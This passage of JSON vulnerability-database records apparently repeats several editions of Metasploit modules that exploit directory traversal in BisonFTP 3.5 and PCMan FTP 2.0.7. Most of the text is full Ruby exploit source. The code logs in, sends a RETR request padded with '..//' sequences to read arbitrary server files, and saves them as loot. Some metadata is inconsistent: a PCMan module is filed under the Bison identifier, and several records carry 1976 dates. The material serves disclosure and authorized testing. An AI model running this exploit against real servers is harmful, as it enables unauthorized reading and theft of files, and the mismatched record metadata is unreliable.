"bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-27T02:37:42", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-27T02:37:42"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-27T02:37:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T02:37:42", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 63}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "30e61a80bd64e31683a2cb002769a675", "type": "metasploit", "bulletinFamily": "exploit", "title": "PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//'\n", "published": "2015-11-08T05:08:23", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7601"], "cvelist": ["CVE-2015-7601"], "lastseen": "2019-07-05T05:34:43", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-27T02:37:42"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-27T02:37:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts', # initial discovery\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38340'],\n [ 'CVE', 
'2015-7601']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n end\n\n def check_host(ip)\n begin\n connect\n if /220 PCMan's FTP Server 2\\.0/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n # Login anonymously and open the socket that we'll use for data retrieval.\n connect_login\n sock = data_connect\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file_path} not found\")\n return\n end\n\n if response_data.length == 0 or ! 
(res =~ /^150/ )\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"pcman.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-05T05:34:43", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 64}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-05T07:37:27", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-05T07:37:27"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-07-05T07:37:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-05T07:37:27", "differentElements": ["modified", "published"], "edition": 65}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "4a45d8a912178abfeaf285407e747950", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-12T04:17:48", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-12T04:17:48"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-07-12T04:17:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-12T04:17:48", "differentElements": ["modified", "published"], "edition": 66}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-12T06:19:53", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-12T06:19:53"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-12T06:19:53"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-12T06:19:53", "differentElements": ["modified", "published"], "edition": 67}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "4a45d8a912178abfeaf285407e747950", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-21T20:48:47", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-12T06:19:53"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-12T06:19:53"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-21T20:48:47", "differentElements": ["modified", "published"], "edition": 68}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-21T21:00:33", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-21T21:00:33"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-21T21:00:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
